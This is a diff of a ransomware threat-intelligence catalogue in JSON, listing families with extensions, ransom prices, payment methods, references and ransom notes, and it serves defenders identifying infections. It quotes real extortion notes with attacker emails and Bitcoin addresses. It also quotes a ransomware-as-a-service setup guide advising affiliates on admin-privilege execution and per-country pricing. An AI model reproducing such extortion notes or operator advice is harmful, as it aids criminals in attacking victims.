price: 0.1 Recommended special decryption prices: FR|0.15|FI|0.15|IE|0.15|IS|0.15|AU|0.15|BE|0.15|CA|0.15|AT|0.15|DK|0.15|SE|0.15|DE|0.15|NL|0.15|SA|0.2|US|0.2|HK|0.2|LU|0.2|CH|0.2|NO|0.2|AE|0.2|SG|0.2|KW|0.2|MO|0.2|QA|0.2 Recommended attacked extensions: *** Recommendation: You need to test builded exe file inside virtual machine, because operability can be broken after crypt/pack of core! \nLinks to website: ***", + "DotRansomware Setup Guide \nAttention!!! \nWe recommend you to build your ransomware inside virtual machine! (But it is safe to use builder on your PC, just don't run builded exe file on your PC!) \nRecommendation: If you have got possibility to run ransomware on victim's computer with administrator privileges then do it. Because it will provide better conversion. Recommended decryption price: 0.1 Recommended special decryption prices: FR|0.15|FI|0.15|IE|0.15|IS|0.15|AU|0.15|BE|0.15|CA|0.15|AT|0.15|DK|0.15|SE|0.15|DE|0.15|NL|0.15|SA|0.2|US|0.2|HK|0.2|LU|0.2|CH|0.2|NO|0.2|AE|0.2|SG|0.2|KW|0.2|MO|0.2|QA|0.2 Recommended attacked extensions: *** Recommendation: You need to test builded exe file inside virtual machine, because operability can be broken after crypt/pack of core! \nLinks to website: ***" + ], + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-BoKI2-Lhsp8/WLHq34zCtdI/AAAAAAAAECo/YkfIG29vRRsLvdn51ctrMEypptRzZS2IgCLcB/s1600/raas.png" ], "refs": [ @@ -569,11 +587,13 @@ ], "payment-method": "Bitcoin", "price": "0.01 - 0.06", - "ransomnotes": [ - "https://4.bp.blogspot.com/-92aP_sumdLo/WLAy3D2kLvI/AAAAAAAAEAQ/FA1j--rOIygsNbDAWqrDqufT7zSwuEnvQCLcB/s1600/note-html_2.png", - "https://3.bp.blogspot.com/-E1vV0sqaw2o/WLB1OvOLCPI/AAAAAAAAEAg/D4OkAOBT_uM4DeVS1hAu6eBGcmga8CSYwCLcB/s1600/site1.png", + "ransomnotes-filenames": [ "ReadMe-[3_random_chars].html" ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-92aP_sumdLo/WLAy3D2kLvI/AAAAAAAAEAQ/FA1j--rOIygsNbDAWqrDqufT7zSwuEnvQCLcB/s1600/note-html_2.png", + "https://3.bp.blogspot.com/-E1vV0sqaw2o/WLB1OvOLCPI/AAAAAAAAEAg/D4OkAOBT_uM4DeVS1hAu6eBGcmga8CSYwCLcB/s1600/site1.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/02/unlock26-ransomware.html", "https://www.bleepingcomputer.com/news/security/new-raas-portal-preparing-to-spread-unlock26-ransomware/" @@ -592,7 +612,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_ME_TO_DECRYPT.txt" ], "refs": [ @@ -652,10 +672,12 @@ ], "payment-method": "Bitcoin", "price": "1(50 - 165$)", - "ransomnotes": [ - "https://www.bleepstatic.com/images/news/u/986406/Ransomware/TrumpLocker/TrumpLocker-wallpaper.jpg", + "ransomnotes-filenames": [ "What happen to my files.txt" ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/u/986406/Ransomware/TrumpLocker/TrumpLocker-wallpaper.jpg" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/new-trump-locker-ransomware-is-a-fraud-just-venuslocker-in-disguise/", "https://id-ransomware.blogspot.co.il/2017/02/trumplocker.html", @@ -673,7 +695,7 @@ "extensions": [ ".damage" ], - "ransomnotes": [ + "ransomnotes-filenames": [ "TtWGgOd57SvPlkgZ***\n ==========\n end of secret_key \nTo restore your files - send e-mail to damage@india.com" ], "refs": [ @@ -716,7 +738,7 @@ ], "payment-method": "Bitcoin", "price": "0.1 (250$)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-S0-Bop8XUgk/WLD_RVgldgI/AAAAAAAAEBU/r2LmgjTHUbMTtIKGH2pHdKfFXcUEOQdMgCLcB/s1600/lock-act2.png" ], "refs": [ @@ -733,10 +755,12 @@ "encryption": "AES", "payment-method": "Bitcoin", "price": "0.5 - 0.7", - "ransomnotes": [ - "https://4.bp.blogspot.com/-M2CMU8RPgqw/WLfqOCgNXrI/AAAAAAAAEGA/W-uAf30qQgoZxqRwblUcSKzYrM5QmcLfgCLcB/s1600/note-html_2.png", + "ransomnotes-filenames": [ "How decrypt files.hta" ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-M2CMU8RPgqw/WLfqOCgNXrI/AAAAAAAAEGA/W-uAf30qQgoZxqRwblUcSKzYrM5QmcLfgCLcB/s1600/note-html_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/02/cryptconsole-2-ransomware.html", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/" @@ -772,7 +796,7 @@ "meta": { "date": "February 2017", "encryption": "AES", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-hvTBarxSO8Y/WKs5kjdpgDI/AAAAAAAAD9Q/m3louiSE6xY0BcGjnWvg_NNDU6K1ok3ggCLcB/s1600/lock.jpg" ], "refs": [ @@ -793,7 +817,9 @@ "payment-method": "Bitcoin", "price": "0.8 - 2", "ransomnotes": [ - "All of your personal information, unfortunately for you, were encrypted\nStep 1 - PAYMENT\nStep 2 - Tell us\nStep 3 - Data Recovery\nYour data and files were encrypted, unfortunately, you need our key. For the encryption each key is unique AES-256 is created on the computer. At the moment, all the files are already encrypted and the keys securely stored in an encrypted form with RSA-2048. \nOnly one way you can recover your files - make payment in Bitcoins and get our key for decryption. Do not believe in any fairy tales on the Internet, it can be circumvented if it was easy, a lot of things in the world stopped working. \nPay according to the instructions, click through the tabs, and wait for your keys. We value the market professional customer service and reputation, so will try to unlock your files as soon as possible.\nPayment Amount: 0,8 BTC\nPayment Amount: 2.1 BTC (another option)", + "All of your personal information, unfortunately for you, were encrypted\nStep 1 - PAYMENT\nStep 2 - Tell us\nStep 3 - Data Recovery\nYour data and files were encrypted, unfortunately, you need our key. For the encryption each key is unique AES-256 is created on the computer. At the moment, all the files are already encrypted and the keys securely stored in an encrypted form with RSA-2048. \nOnly one way you can recover your files - make payment in Bitcoins and get our key for decryption. Do not believe in any fairy tales on the Internet, it can be circumvented if it was easy, a lot of things in the world stopped working. \nPay according to the instructions, click through the tabs, and wait for your keys. We value the market professional customer service and reputation, so will try to unlock your files as soon as possible.\nPayment Amount: 0,8 BTC\nPayment Amount: 2.1 BTC (another option)" + ], + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-0D8XdlTNIsA/WLXFiBWz5II/AAAAAAAAEFQ/Hojw0BHHysUieiCnidoVwTrqXVCckLkSQCLcB/s1600/lock-screen.jpg" ], "refs": [ @@ -829,7 +855,7 @@ "meta": { "date": "February 2017", "encryption": "AES", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-OCBIabrrZNg/WLm1RGFVKEI/AAAAAAAAEHY/1MASb-0Y7jsBlE2TzyqgknrfDhuEsNx2gCLcB/s1600/Screenshot_1.png" ], "refs": [ @@ -846,7 +872,7 @@ "encryption": "AES-256", "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-viZiAZr3_ns/WKrIDWEEBXI/AAAAAAAAD8c/8n1RJ9m2Odoe3bvMMmIm421NdxS-OIRzQCLcB/s1600/note_2.png" ], "refs": [ @@ -868,10 +894,12 @@ ], "payment-method": "Dollars", "price": "500", - "ransomnotes": [ - "https://2.bp.blogspot.com/-ehXlWPLxtR8/WKdHF_Y-MeI/AAAAAAAAD5A/KKXO-S9OtMQAcNM-IOV2ees8qKlAJ3pzACLcB/s1600/note.jpg", + "ransomnotes-filenames": [ "INSTRUCCIONES.txt" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-ehXlWPLxtR8/WKdHF_Y-MeI/AAAAAAAAD5A/KKXO-S9OtMQAcNM-IOV2ees8qKlAJ3pzACLcB/s1600/note.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/02/kasiski-ransomware.html", "https://twitter.com/MarceloRivero/status/832302976744173570", @@ -915,9 +943,11 @@ ".CRYPTOSHIELD (The name is first changed using ROT-13, and after a new extension is added.)" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "# RESTORING FILES #.txt", - "# RESTORING FILES #.html", + "# RESTORING FILES #.html" + ], + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-A-N9zQgZrhE/WJHAHzuitvI/AAAAAAAADhI/AHkLaL9blZgqQWc-sTevVRTxVRttbugoQCLcB/s1600/note-2.png" ], "refs": [ @@ -938,11 +968,15 @@ ], "payment-method": "Email - Bitcoin", "ransomnotes": [ - "https://4.bp.blogspot.com/-nzY6thZOXSk/WKbYmWxa0rI/AAAAAAAAD3s/t_3d90FGOe8je8rfeeYLF1jzJinG5JMVgCLcB/s1600/note_2_2.png", - "https://3.bp.blogspot.com/-Yisae5e5Pjs/WKbXmIXU8YI/AAAAAAAAD3g/WZs5XzL4l4snT2j4yfc3CAaF7KonH_DQACLcB/s1600/note_1.png", - "DECRYPT_INFORMATION.html", "UNIQUE_ID_DO_NOT_REMOVE" ], + "ransomnotes-filenames": [ + "DECRYPT_INFORMATION.html" + ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-nzY6thZOXSk/WKbYmWxa0rI/AAAAAAAAD3s/t_3d90FGOe8je8rfeeYLF1jzJinG5JMVgCLcB/s1600/note_2_2.png", + "https://3.bp.blogspot.com/-Yisae5e5Pjs/WKbXmIXU8YI/AAAAAAAAD3g/WZs5XzL4l4snT2j4yfc3CAaF7KonH_DQACLcB/s1600/note_1.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/02/hermes-ransomware.html", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/", @@ -970,7 +1004,7 @@ "extensions": [ ".hasp" ], - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-YdCKWLUFBOo/WKRCD2BLzTI/AAAAAAAAD14/BPtYMLvQpEMAbT-ZdiCVPi_LZCrXYJMhwCLcB/s1600/ReadME%2521.txt.jpg" ], "refs": [ @@ -990,7 +1024,7 @@ ], "payment-method": "Bitcoin", "price": "0.1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-iUq492KUatk/WKH-GXnO4-I/AAAAAAAADzw/9uwo1LF5ciIvMJ6jAn3mskSqtdiTkxvlACLcB/s1600/lock-note.jpg" ], "refs": [ @@ -1007,7 +1041,7 @@ "encryption": "AES", "payment-method": "Bitcoin", "price": "0,3169", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-_Udncaac_gM/WKROBN00ORI/AAAAAAAAD2U/HsHkEspG85YSfPg-8MbPYYTYmBU4PAJAgCLcB/s1600/note_2.png", "https://4.bp.blogspot.com/-Vx9ZtCODajg/WKiMr2QX5cI/AAAAAAAAD64/QAh37o_CRIImaxUfIhoEh8qE4JLn5HaNwCLcB/s1600/dumb.jpg" ], @@ -1048,7 +1082,7 @@ ], "payment-method": "Dollars", "price": "249", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-ahpZEI1FHQM/WJd7_dpYlyI/AAAAAAAADm8/4-nFXqc9bjEI93VDJRdsLSlBOwQiaM7swCLcB/s1600/note.jpg" ], "refs": [ @@ -1067,10 +1101,12 @@ ".yourransom" ], "payment-method": "Email", - "ransomnotes": [ - "https://4.bp.blogspot.com/-dFQlF_6uTkI/WJYigC5GwiI/AAAAAAAADlk/jm-ZwqJ2mVYd2gtAQgYW_lOd78u5N2x0ACLcB/s1600/note_2.png", + "ransomnotes-filenames": [ "README.txt" ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-dFQlF_6uTkI/WJYigC5GwiI/AAAAAAAADlk/jm-ZwqJ2mVYd2gtAQgYW_lOd78u5N2x0ACLcB/s1600/note_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/02/yourransom-ransomware.html", "https://www.bleepingcomputer.com/news/security/yourransom-is-the-latest-in-a-long-line-of-prank-and-educational-ransomware/", @@ -1087,7 +1123,7 @@ "encryption": "AES-256", "payment-method": "Bitcoin", "price": "0.6 - 0.95", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-ORiqmM6oWXc/WJV7X4IvTWI/AAAAAAAADlE/wXvz5Hsv1gQ-UrLoA1plVjLTVD7iDDxwQCLcB/s1600/buy_2.png" ], "refs": [ @@ -1107,10 +1143,12 @@ ".potato" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "How to recover my files.txt", "README.png", - "README.html", + "README.html" + ], + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-E9GDxEoz95k/WIop79nWZ2I/AAAAAAAADZU/CnsvOl96yesoH07BZ2Q05Fp40kLcTMmqQCLcB/s1600/note.jpg" ], "refs": [ @@ -1130,11 +1168,15 @@ ], "payment-method": "Email", "ransomnotes": [ + "Your files are encrypted! To decrypt write on email - opentoyou@india.comIdentification key - 5E1C0884" + ], + "ransomnotes-filenames": [ "!!!.txt", "1.bmp", - "1.jpg", - "https://3.bp.blogspot.com/-RPeHrC9Trqk/WGk1kQlBQQI/AAAAAAAAC6o/FutnWrlUf44hq54_xI_6Uz2migCR0rwlwCLcB/s1600/Note-wallp.jpg", - "Your files are encrypted! To decrypt write on email - opentoyou@india.comIdentification key - 5E1C0884" + "1.jpg" + ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-RPeHrC9Trqk/WGk1kQlBQQI/AAAAAAAAC6o/FutnWrlUf44hq54_xI_6Uz2migCR0rwlwCLcB/s1600/Note-wallp.jpg" ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/opentodecrypt-ransomware.html" @@ -1154,10 +1196,14 @@ "payment-method": "Bitcoin", "price": "0.25", "ransomnotes": [ - "YOUR FILES ARE ENCRYPTED!!!.txt", - "https://2.bp.blogspot.com/-uIb_TdWTk3Q/WI2qRSlsXJI/AAAAAAAADcE/h92XEY6AraQMUwEIOBZ9moxN1J2So8xpwCLcB/s1600/note_2.png", "YOUR FILES ARE ENCRYPTED!!! To restore (decrypt) them you must:\n1. Pay 0.25 bitcoin (btc) to address 36QLSB*** You can get BTC on this site http://localbitcoins.com \n2. After payment you must send Bitcoin Transacation ID to E-mail: andresaha82@gmail.com Then we will send you decryption tool." ], + "ransomnotes-filenames": [ + "YOUR FILES ARE ENCRYPTED!!!.txt" + ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-uIb_TdWTk3Q/WI2qRSlsXJI/AAAAAAAADcE/h92XEY6AraQMUwEIOBZ9moxN1J2So8xpwCLcB/s1600/note_2.png" + ], "refs": [ "http://www.2-spyware.com/remove-ransomplus-ransomware-virus.html", "https://id-ransomware.blogspot.co.il/2017/01/ransomplus-ransomware.html", @@ -1179,9 +1225,11 @@ "payment-method": "Bitcoin", "price": "0.2", "ransomnotes": [ - "How decrypt files.hta", "Your files are encrypted! Your personal ID764F6A6664514B414373673170615339554A534A5832546A55487169644B4A35 Discovered a serious vulnerability in your network security. No data was stolen and no one will be able to do it while they are encrypted. For you we have automatic decryptor and instructions for remediation. How to get the automatic decryptor : \n1) Pay 0,25 BTC Buy BTC on one of these sites: https://localbitcoins.com https://www.coinbase.com https://xchange.cc bitcoin adress for pay: 1KG8rWYWRYHfvjVe8ddEyJNCg6HxVWYSQm Send 0,25 BTC \n2) Send screenshot of payment to unCrypte@outlook.com. In the letter include your personal ID (look at the beginning of this document). \n3) You will receive automatic decryptor and all files will be restored \n* To be sure in getting the decryption, you can send one file (less than 10MB) to unCrypte@outlook.com In the letter include your personal ID (look at the beginning of this document). But this action will increase the cost of the automatic decryptor on 0,25 btc... \nAttention! \n• No Payment = No decryption \n• You really get the decryptor after payment \n• Do not attempt to remove the program or run the anti-virus tools \n• Attempts to self-decrypting files will result in the loss of your data \n• Decoders other users are not compatible with your data, because each user's unique encryption key" ], + "ransomnotes-filenames": [ + "How decrypt files.hta" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/cryptconsole-ransomware.html", "https://www.bleepingcomputer.com/forums/t/638344/cryptconsole-uncrypteoutlookcom-support-topic-how-decrypt-fileshta/", @@ -1232,9 +1280,11 @@ "payment-method": "Bitcoin", "price": "0,65806", "ransomnotes": [ - "note.iti", "Important Information!!!! You had bad luck. All your files are encrypted with RSA and AES ciphers. to get your files back read carefully. if you do not understand, Read again. All your documents are recoverable only with our software and key file. To decrypt files you need to contact worldfunfact@sigaint.org or funfacts11@tutanota.com and set your ID as email title and send clsign.dll file from your computer. That is the key file and yes, it’s encrypted. Search your computer for filename “clsign.dll” attach it to email. if you wish we will decrypt one of your encrypted file for free! It’s your guarantee. After you made payment you will receive decryption software with key and necessary instructions. if you don’t contact us within 72 hours we will turn on sanctions. you’ll have to pay more. Recovery is only possible during 7 days. after that don’t contact us. Remember you are just single payment away from all your files If your files are urgent pay exactly requested amount to Bitcoin (BTC) address and send clsign.dll file to us. We will send your decryption software within 24 hours; remember if you contact us first maybe you’ll have to pay less\nUser ID: 658061***\nBTC Address: 1AQrj***\nAmount(BTC): 1.65806\n-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion:\nGnuPG\nv2\n*******************************\n-----END PGP PUBLIC KEY BLOCK-----" ], + "ransomnotes-filenames": [ + "note.iti" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/funfact.html", "http://www.enigmasoftware.com/funfactransomware-removal/" @@ -1252,12 +1302,14 @@ ".<7_random_letters>" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "encrypted_readme.txt", "__encrypted_readme.txt", - "https://2.bp.blogspot.com/-CLo4JTpveKY/WI4sVXEQSPI/AAAAAAAADcU/n8qrwehDEQMlG845cjNow_fC4PDqlvPIQCLcB/s1600/note_2.png", "WARNING! Your personal files are encrypted! Your most important files on this computer have been encrypted: photos, documents, videos, music, etc. You can verify this by trying to open such files. Encryption was produced using an UNIQUE public RSA-4096 key, specially generated for this computer only, thus making it impossible to decrypt such files without knowing private key and comprehensive decipher software. We have left on our server a copy of the private key, along with all required software for the decryption. To make sure that software is working as intended you have a possibility to decrypt one file for free, see contacts below. The private key will be destroyed after 7 days, afterwards making it impossible to decrypt your files. Encryption date: *** Private key destruction date: *** For obtaining decryption software, please, contact: myserverdoctor@gmail.com or XMPP jabber: doctordisk@jabbim.com" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-CLo4JTpveKY/WI4sVXEQSPI/AAAAAAAADcU/n8qrwehDEQMlG845cjNow_fC4PDqlvPIQCLcB/s1600/note_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/06/zekwacrypt-ransomware.html", "http://www.2-spyware.com/remove-zekwacrypt-ransomware-virus.html" @@ -1276,11 +1328,13 @@ ], "payment-method": "Bitcoin", "price": "2,15555 (2000$)", - "ransomnotes": [ - "https://2.bp.blogspot.com/-6YhxRaqa_9Q/WISA9dW31bI/AAAAAAAADUE/78mNNKpPMyc2Gzi1N9CooyQp7RNT40NNgCLcB/s1600/note1_2.png", - "https://1.bp.blogspot.com/-_c5vGu4nCvE/WIT_pWP_FSI/AAAAAAAADUs/8hK8a4E48sY3U_aAHC2qNzYDBL0bQcNjgCLcB/s1600/note-wallp111.png", + "ransomnotes-filenames": [ "!Recovery_[3_random_chars].html" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-6YhxRaqa_9Q/WISA9dW31bI/AAAAAAAADUE/78mNNKpPMyc2Gzi1N9CooyQp7RNT40NNgCLcB/s1600/note1_2.png", + "https://1.bp.blogspot.com/-_c5vGu4nCvE/WIT_pWP_FSI/AAAAAAAADUs/8hK8a4E48sY3U_aAHC2qNzYDBL0bQcNjgCLcB/s1600/note-wallp111.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/sage-2-ransomware.html", "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", @@ -1298,8 +1352,10 @@ "date": "January 2017", "encryption": "AES", "payment-method": "Bitcoin", - "ransomnotes": [ - "Warning警告.html", + "ransomnotes-filenames": [ + "Warning警告.html" + ], + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-OTxFEWf7LiY/WIO0rJmBgJI/AAAAAAAADTQ/U3BLcd2-CPQQ_73eIKIyg28cKFmw4nctgCLcB/s1600/note.jpg" ], "refs": [ @@ -1321,7 +1377,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-llR46G5zOBE/WIJuTTHImXI/AAAAAAAADS8/Ww_QU1Z7Q3geZgiSStJB3siO3oQJpIcowCLcB/s1600/note.jpg", "https://4.bp.blogspot.com/-ilIaUD5qOuk/WIJuV1TuC1I/AAAAAAAADTA/SOj8St_qXMsgDexK1BGgZT0yFDkNDz_7QCLcB/s1600/lock.jpg" ], @@ -1345,8 +1401,10 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ - "HOW_OPEN_FILES.html", + "ransomnotes-filenames": [ + "HOW_OPEN_FILES.html" + ], + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-w6lxK0qHj8A/WIO_iAngUzI/AAAAAAAADTk/dLGlrwwOh508AlG2ojLRszpUxL0tHrtSQCLcB/s1600/note-html.jpg" ], "refs": [ @@ -1366,10 +1424,12 @@ ], "payment-method": "Bitcoin", "price": "0.1 - your choice", - "ransomnotes": [ - "https://1.bp.blogspot.com/-5BgSHIym-8Y/WIH92q4ymHI/AAAAAAAADSk/MF2T-mmhuY4irQZFqmpGZjmUI2onlNCyACLcB/s1600/ransom-note.png", + "ransomnotes-filenames": [ "HELP_DECRYPT_FILES.html" ], + "ransomnotes-refs": [ + "https://1.bp.blogspot.com/-5BgSHIym-8Y/WIH92q4ymHI/AAAAAAAADSk/MF2T-mmhuY4irQZFqmpGZjmUI2onlNCyACLcB/s1600/ransom-note.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/satan-raas.html", "https://www.bleepingcomputer.com/forums/t/637811/satan-ransomware-help-support-topic-stn-extension-help-decrypt-fileshtml/", @@ -1400,7 +1460,7 @@ ], "payment-method": "Bitcoin", "price": "150 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-Xs7yigomWw8/WH0mqn0QJLI/AAAAAAAADKA/0Fk5QroMsgQ3AsXbHsbVtopcJN4qzDgdACLcB/s1600/note.jpg" ], "refs": [ @@ -1423,9 +1483,11 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "IMPORTANTE_LEER.html", - "RECUPERAR_ARCHIVOS.html", + "RECUPERAR_ARCHIVOS.html" + ], + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-KE6dziEK4To/WHnvPzKOs7I/AAAAAAAADHI/KPBjmO9iChgAa12-f1VOxF49Pv27-0XfQCLcB/s1600/note.jpg" ], "refs": [ @@ -1447,9 +1509,11 @@ "payment-method": "Bitcoin", "price": "1", "ransomnotes": [ - "https://4.bp.blogspot.com/-v3jncd77m3U/WHkjPoEusKI/AAAAAAAADGE/xJOIgzm-ST0L4kpNeThKTyfukq3e1Th-QCLcB/s1600/troll-22.png", "You have been struck by the holy Kaandsona ransomware Either you pay 1 BTC in 24 hours or you lose ALL FILES \nbutton 'Show all encrypted files' \nbutton 'PAY'" ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-v3jncd77m3U/WHkjPoEusKI/AAAAAAAADGE/xJOIgzm-ST0L4kpNeThKTyfukq3e1Th-QCLcB/s1600/troll-22.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/kaandsona-ransomtroll.html", "https://twitter.com/BleepinComputer/status/819927858437099520" @@ -1472,8 +1536,10 @@ ], "payment-method": "Bitcoin", "price": "0.5 - 1", - "ransomnotes": [ - "READ_IT.hTmL", + "ransomnotes-filenames": [ + "READ_IT.hTmL" + ], + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-B3o6bGziu_M/WHkyueI902I/AAAAAAAADGw/la7psCE9JEEe17GipFh69xVnIDYGFF38wCLcB/s1600/note-1-2.gif" ], "refs": [ @@ -1493,8 +1559,10 @@ ".HakunaMatata" ], "payment-method": "Website (onion)", - "ransomnotes": [ - "Recovers files yako.html", + "ransomnotes-filenames": [ + "Recovers files yako.html" + ], + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-DUXeyyzqwKs/WHkrGvLyFvI/AAAAAAAADGg/SPfrNMZYGs8edE7X5z-3MBroIqS5GQ8kACLcB/s1600/note_1-str_2.png" ], "refs": [ @@ -1518,11 +1586,13 @@ ], "payment-method": "Bitcoin", "price": "0.2", - "ransomnotes": [ - "https://4.bp.blogspot.com/-7UmhPM2VSKY/WHe5tDsHfuI/AAAAAAAADFM/FRdUnAyxAggvF0hX0adtrpq48F7HXPbawCLcB/s1600/check-decrypt.png", - "https://1.bp.blogspot.com/-MWRTa6aXtdk/WHflJFyb-GI/AAAAAAAADFs/dc-l-RrWSCAPE8akw2SCb1uuj-a-2shiwCLcB/s1600/docm.png", + "ransomnotes-filenames": [ "_HELP_Recover_Files_.html" ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-7UmhPM2VSKY/WHe5tDsHfuI/AAAAAAAADFM/FRdUnAyxAggvF0hX0adtrpq48F7HXPbawCLcB/s1600/check-decrypt.png", + "https://1.bp.blogspot.com/-MWRTa6aXtdk/WHflJFyb-GI/AAAAAAAADFs/dc-l-RrWSCAPE8akw2SCb1uuj-a-2shiwCLcB/s1600/docm.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/marlboro.html", "https://decrypter.emsisoft.com/marlboro", @@ -1539,10 +1609,12 @@ "encryption": "AES+RSA", "payment-method": "Bitcoin", "price": "79$", - "ransomnotes": [ - "https://1.bp.blogspot.com/-0COE3ADdaYk/WHpnHzuo7OI/AAAAAAAADHY/yfDF3XG720Yyn3xQHwFngt1T99cT-Xt3wCLcB/s1600/rus-note_2.png", + "ransomnotes-filenames": [ "[Infection-ID].HTML" ], + "ransomnotes-refs": [ + "https://1.bp.blogspot.com/-0COE3ADdaYk/WHpnHzuo7OI/AAAAAAAADHY/yfDF3XG720Yyn3xQHwFngt1T99cT-Xt3wCLcB/s1600/rus-note_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/spora-ransomware.html", "https://blog.gdatasoftware.com/2017/01/29442-spora-worm-and-ransomware", @@ -1577,7 +1649,7 @@ ], "payment-method": "Bitcoin", "price": "0.35", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-mwIvQNkFH4g/WKAydZnGn_I/AAAAAAAADxs/6xHgbD3OUFUbebeuNVkI6tp_cMRVUQHtQCLcB/s1600/note_2.png" ], "refs": [ @@ -1597,7 +1669,7 @@ ], "payment-method": "Bitcoin", "price": "500$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-OY8jgTN5Y9Q/WKAI6a9xfMI/AAAAAAAADwc/ng36hAXsvfYQ5rdkSFeVgEvLY88pJmnWACLcB/s1600/note-html-wallp.jpg", "https://3.bp.blogspot.com/-DQQ5tk0C9lY/WKALND0dYPI/AAAAAAAADwo/EuKiO_F0Mn0ImrGLVE-Sks-j93pHoTjKACLcB/s1600/konstr.jpg" ], @@ -1618,7 +1690,7 @@ "encryption": "AES", "payment-method": "Bitcoin", "price": "0.33", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-5t-5eBl4Tng/WKARmYV5GVI/AAAAAAAADxA/OuS7Eo__z1sh2tRbBpQIxJQ6IVbSiQakwCLcB/s1600/lock-note.jpg" ], "refs": [ @@ -1640,7 +1712,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-kolk6sABFzQ/WJ95ddcAxNI/AAAAAAAADwI/oP8ZFD7KnqoQWgpfgEHId843x3l0xfhjACLcB/s1600/note_2.png" ], "refs": [ @@ -1662,7 +1734,7 @@ ], "payment-method": "Bitcoin", "price": "50$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-Qx8RhielSbI/WJypR9Zw9nI/AAAAAAAADus/Opsfy8FxRIIBmouywdl7uT94ZpfwKr6JACLcB/s1600/note.jpg" ], "refs": [ @@ -1706,10 +1778,12 @@ "encryption": "ROT-23", "payment-method": "Bitcoin", "price": "0.085", - "ransomnotes": [ - "https://1.bp.blogspot.com/-tAp9wE6CJxM/WJrvOOyIfRI/AAAAAAAADts/iMfaiDRyRcQuPXgtQV--qt7q8ZI3ZV0tQCLcB/s1600/note1%252B.jpg", + "ransomnotes-filenames": [ "README.HTML" ], + "ransomnotes-refs": [ + "https://1.bp.blogspot.com/-tAp9wE6CJxM/WJrvOOyIfRI/AAAAAAAADts/iMfaiDRyRcQuPXgtQV--qt7q8ZI3ZV0tQCLcB/s1600/note1%252B.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/02/erebus-2017-ransomware.html", "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" @@ -1727,7 +1801,7 @@ ], "payment-method": "Bitcoin", "price": "0.085", - "ransomnotes": [ + "ransomnotes-refs": [ 